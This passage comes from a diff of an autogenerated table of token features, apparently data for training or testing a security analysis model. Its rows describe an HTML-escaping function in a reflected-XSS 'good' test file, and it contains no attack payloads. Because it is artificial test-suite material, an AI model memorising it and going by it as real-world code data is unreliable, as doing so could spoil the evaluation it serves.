autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts = ... (0, i)] | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:7:77:37 | parts = ... (0, i)] | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:15:77:37 | [value. ... (0, i)] | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:15:77:37 | [value. ... (0, i)] | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:15:77:37 | [value. ... (0, i)] | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:15:77:37 | [value. ... (0, i)] | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:15:77:37 | [value. ... (0, i)] | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:20 | value | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:20 | value | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:20 | value | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:20 | value | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:20 | value | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:30 | value.substring | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:30 | value.substring | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:30 | value.substring | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:30 | value.substring | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:30 | value.substring | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | exceptional return of value.s ... g(0, i) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | exceptional return of value.s ... g(0, i) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | exceptional return of value.s ... g(0, i) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | exceptional return of value.s ... g(0, i) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | exceptional return of value.s ... g(0, i) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:16:77:36 | value.s ... g(0, i) | stringConcatenatedWith | -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:22:77:30 | substring | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:22:77:30 | substring | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:22:77:30 | substring | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:22:77:30 | substring | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:22:77:30 | substring | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:32:77:32 | 0 | CalleeFlexibleAccessPath | value.substring | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:32:77:32 | 0 | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:32:77:32 | 0 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20873,6 +139021,71 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:35:77:35 | i | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:35:77:35 | i | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:77:35:77:35 | i | receiverName | value | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:10 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:19 | i < length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:19 | i < length | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:19 | i < length | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:19 | i < length | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:10:78:19 | i < length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:14:78:19 | length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:14:78:19 | length | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:14:78:19 | length | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:14:78:19 | length | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:78:14:78:19 | length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:79:13:79:14 | ch | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:79:13:79:14 | ch | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:79:13:79:14 | ch | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:79:13:79:14 | ch | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:79:13:79:14 | ch | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:19 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:19 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:19 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:19 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:19 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:23 | XMLChars.AMP | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:23 | XMLChars.AMP | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:23 | XMLChars.AMP | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:23 | XMLChars.AMP | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:12:80:23 | XMLChars.AMP | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:21:80:23 | AMP | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:21:80:23 | AMP | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:21:80:23 | AMP | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:21:80:23 | AMP | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:80:21:80:23 | AMP | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:13 | parts | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:13 | parts | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:13 | parts | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:13 | parts | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:13 | parts | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:18 | parts.push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:18 | parts.push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:18 | parts.push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:18 | parts.push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:18 | parts.push | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | exceptional return of parts.push('&') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | exceptional return of parts.push('&') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | exceptional return of parts.push('&') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | exceptional return of parts.push('&') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | exceptional return of parts.push('&') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | parts.push('&') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | parts.push('&') | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | parts.push('&') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | parts.push('&') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:9:81:27 | parts.push('&') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:15:81:18 | push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:15:81:18 | push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:15:81:18 | push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:15:81:18 | push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:15:81:18 | push | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:20:81:26 | '&' | CalleeFlexibleAccessPath | parts.push | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:20:81:26 | '&' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:20:81:26 | '&' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | @@ -20881,6 +139094,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:20:81:26 | '&' | enclosingFunctionName | escapeHtml3 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:20:81:26 | '&' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:81:20:81:26 | '&' | receiverName | parts | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:19 | XMLChars | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:19 | XMLChars | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:19 | XMLChars | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:19 | XMLChars | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:19 | XMLChars | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:24 | XMLChars.QUOT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:24 | XMLChars.QUOT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:24 | XMLChars.QUOT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:24 | XMLChars.QUOT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:12:83:24 | XMLChars.QUOT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:21:83:24 | QUOT | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:21:83:24 | QUOT | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:21:83:24 | QUOT | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:21:83:24 | QUOT | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:83:21:83:24 | QUOT | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:13 | parts | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:13 | parts | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:13 | parts | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:13 | parts | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:13 | parts | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:18 | parts.push | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:18 | parts.push | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:18 | parts.push | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:18 | parts.push | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:18 | parts.push | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | exceptional return of parts.push('"') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | exceptional return of parts.push('"') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | exceptional return of parts.push('"') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | exceptional return of parts.push('"') | enclosingFunctionName | escapeHtml3 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | exceptional return of parts.push('"') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | parts.push('"') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | parts.push('"') | contextSurroundingFunctionParameters | (value) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | parts.push('"') | enclosingFunctionBody | value i 0 XMLChars AMP 38 QUOT 34 LT 60 GT 62 parts value substring 0 i i length ch XMLChars AMP parts push & XMLChars QUOT parts push " XMLChars LT parts push < XMLChars GT parts push > i j i i length ch value charCodeAt i ch XMLChars AMP ch XMLChars QUOT ch XMLChars LT ch XMLChars GT i j i parts push value substring j i parts join | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:84:9:84:28 | 